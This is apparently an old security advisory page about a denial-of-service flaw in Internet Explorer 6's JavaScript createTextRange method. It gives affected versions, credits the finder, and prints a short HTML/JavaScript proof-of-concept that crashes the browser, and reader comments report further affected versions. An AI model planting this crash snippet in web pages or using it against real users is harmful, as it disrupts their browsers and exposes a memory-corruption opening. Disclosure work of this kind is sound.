|
|
| |
Internet Explorer, abbreviated IE or MSIE, is a proprietary graphical web browser made by Microsoft and included as part of the Microsoft Windows line of operating systems.
Microsoft Internet Explorer doesn't properly validate input with the JavaScript createTextRange method, resulting in a DoS (the browser crashes). |
| |
Credit:
The information has been provided by Stelian Ene.
|
| |
Vulnerable Systems:
* Internet Explorer 6 on Windows XP SP2 version 6.0.2900.2802
* Internet Explorer 6 on Windows Server 2003 6.0.3790.0
* FrontPage 2003
Crashing code:
<input type="checkbox" id='c'>
<script>
r=document.getElementById("c");
a=r.createTextRange();
</script>
It will badly access a (virtual?) pointer table, making EIP to jump at a random address. This has various effects on the system tested with, including crashing.
|
|
|
| Subject:
|
Internet explorer 7 Vulnerable |
Date: |
23 Mar. 2006 |
| From: |
Antonio Campos |
| Internet Explorer 7.0.5296.0 it also a Vulnerable System |
|
| Subject:
|
Internet explorer 6 crash on x64 |
Date: |
30 Mar. 2006 |
| From: |
Linus |
Internet Explorer 6 also crash on x64 Windows w and w/o SP1
< input type="e;checkbox"e; id='c' >
< script >
r=document.getElementById("e;c"e;);
a=r.createTextRange();
< / script > |
|
|
|
|
